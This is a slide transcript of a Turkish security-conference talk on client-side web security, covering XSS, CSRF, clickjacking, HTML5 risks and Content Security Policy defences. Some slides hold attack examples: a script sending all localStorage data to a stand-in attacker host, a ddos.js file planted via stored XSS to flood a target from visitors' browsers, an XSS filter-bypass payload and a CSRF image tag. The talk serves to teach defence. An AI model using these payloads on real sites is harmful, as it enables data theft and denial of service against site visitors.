siber güvenlik konferansı' 14 client-side security & csp (1)
TRANSCRIPT
![Page 1: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/1.jpg)
Son Kullanıcı Güvenliği &
CSPMehmet Dursun İNCE
![Page 2: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/2.jpg)
mince@rootlab ~ $ whoami
Mehmet Dursun İNCEPenetration Tester at IntelRADZafiyet AraştırmacısıBlog Yazarı: www.mehmetince.netLinux & OpenSource PHP, Python, ...
![Page 3: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/3.jpg)
mince@rootlab ~ $ cat icerik.txt
Client-Side Security Nedir ?CSRF, XSS ve ClickJackingInternet TarayıcılarıHTML5SKiddieTrapper.js & CryptoPost.js
![Page 4: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/4.jpg)
Son Kullanıcı Güvenliği Nedir ?
● SSL’den ibaret değildir.● Güvenli “oturum” yönetimi gerektirir.● User Interface güvenliği
![Page 5: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/5.jpg)
S.K. Yönelik Popüler Siber Tehditler
● ...● XSS● CSRF● Clickjacking● ...
![Page 6: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/6.jpg)
XSS
XSS <script>alert(1)</script>’den ibaret değildir.
COOKIE değil Browser.
![Page 7: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/7.jpg)
XSS Tehlikeleri - Password Cracking
● HTML5 - WebWorker
● Cracking Speed : 609.384 / sec (MD5)
● Ravan - JavaScript Distributed Computing System
![Page 8: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/8.jpg)
XSS Tehlikeleri - L7 DDoS
● XMLHttpRequest - WebSockets
● www.hedef.com/?search=”a”+”b”
● 10,000 / min
![Page 9: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/9.jpg)
XSS Tehlikeleri - Demo - Step 1
● http://www.hacker.com/ddos.js
![Page 10: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/10.jpg)
XSS Tehlikeleri - Demo - Step 2
● Dakika içinde 100 tekil kullanıcı alan web sitesine ddos.js dosyası Stored XSS vb yöntemler ile yerleştirilir.
● Örneğin : e-ticaret, gazete/haber siteleri.● Sosyal mühendislik + reklam (JS!) ?
![Page 11: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/11.jpg)
XSS Tehlikeleri - Demo - Step 3
● http://lab.mehmetince.net adresine giren Chrome kullanıcıları.
![Page 12: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/12.jpg)
XSS Tehlikeleri - Demo - Step 3
● Request sunucuya erişecektir, dönen değerin okunması ve işlemi alınması yasaktır!
![Page 13: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/13.jpg)
XSS Tehlikeleri - Demo - Sonuç
● Ortalama her tarayıcı 10,000 talep / dakika● Dakika içerisinde 100 tekil kullanıcı alan bir
sitenin ziyaretçileri üzerinden;● Toplam ≃ 1.200.000 / dakika ● = 200.000 / saniye ● WAF ? Firewall ?
![Page 14: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/14.jpg)
CSRF - Cross Site Request Forgery
Özet - HTTP GET;…<img src="//site.com/sing_out">…
![Page 15: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/15.jpg)
CSRF - Cross Site Request Forgery
Özet - HTTP POST;
![Page 16: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/16.jpg)
CSRF - Demo - Step 1
1. Hedef : eticaret sitesi kullanıcıları.2. Kullanıcı mail adresi değişikliği işleminde
mevcut şifre talep edilmemektedir.3. Uygulama genelinde CSRF Token
kullanılmamıştır.
![Page 17: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/17.jpg)
CSRF - Demo - Step 2
1. www.herhangibirsite.com adresine aşağıdaki CSRF Exploit kodları yerleştirilir.
![Page 18: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/18.jpg)
CSRF - Demo - Step 3.1
www.herhangibirsite.com adresini ziyaret eden kullanıcı, farkında olmadan email adresini değiştiren HTTP talebini gönderir.
![Page 19: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/19.jpg)
CSRF - Demo - Step 3.2
EMAIL DOĞRULAMA
![Page 20: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/20.jpg)
CSRF - Demo - Step 4
ŞİFREMİ UNUTTUM
![Page 21: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/21.jpg)
![Page 22: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/22.jpg)
ClickJacking
![Page 23: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/23.jpg)
ClickJacking - Önlemi
X-Frame-Options : DENY, SAMEORIGIN,
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
![Page 24: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/24.jpg)
HTML5 Avantajları
● Blacklist Bypass○ ...○ <video poster=javascript:alert(1)//></video>○ …
![Page 25: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/25.jpg)
HTML5 Local Storage <script>localStorage.setItem("email", "[email protected]");var f = document.getElementById("email");f.innerHTML=localStorage.getItem("email");</script>
![Page 26: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/26.jpg)
HTML5 Local Storage <script>for(var i = 0; i < localStorage.length; i++){ var key = localStorage.key(i); var a = new Image(); a.src="http://saldirgan/kaydet.php?key=" + key + "&value=" + localStorage.getItem(key);}</script>
![Page 27: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/27.jpg)
Content Security Policy
![Page 28: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/28.jpg)
Content Security Policy - Özellikler connect-src : WebSocket, XHR, EventSourcefont-src : https://themes.googleusercontent.comframe-src: https://youtube.comimg-src : * -Her şeye izin ver-media-src : *.site.comobject-src : self -Flash vb-script-src : ‘self’ ‘unsafe-eval’ ‘unsafe-inline’style-src : self
![Page 29: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/29.jpg)
Content Security Policy - Örnek
![Page 30: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/30.jpg)
Facebook CSP Örneği
![Page 31: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/31.jpg)
Content Security Policy - Rapor script-src : ‘self’ report-uri : ‘log.php’
![Page 32: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/32.jpg)
X-XSS-Protection X-XSS-Protection: 1; mode=block
![Page 33: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/33.jpg)
CryptoPost.js
● RSA Key Encryption● POST parametreleri encrypt etmek.● Hacker’lara ve MITM saldırılarına önlem.● Opensource ve pull request’e açık.● https://github.com/mmetince/crypto_post
![Page 34: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/34.jpg)
SKiddieTrapper.js
● Potansiyel saldırganlara tuzak kurmak.● FORM’lara input’lar enjekte etmekte.● Opensource ve pull request’e açık.● https://github.com/mmetince/skiddie_trapper●
![Page 35: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/35.jpg)
SKiddieTrapper.js
![Page 36: Siber güvenlik konferansı' 14 client-side security & csp (1)](https://reader030.vdocuments.site/reader030/viewer/2022020207/55662035d8b42a7d608b52ba/html5/thumbnails/36.jpg)
Teşekkürler
● www.mehmetince.net● twitter.com/mmetince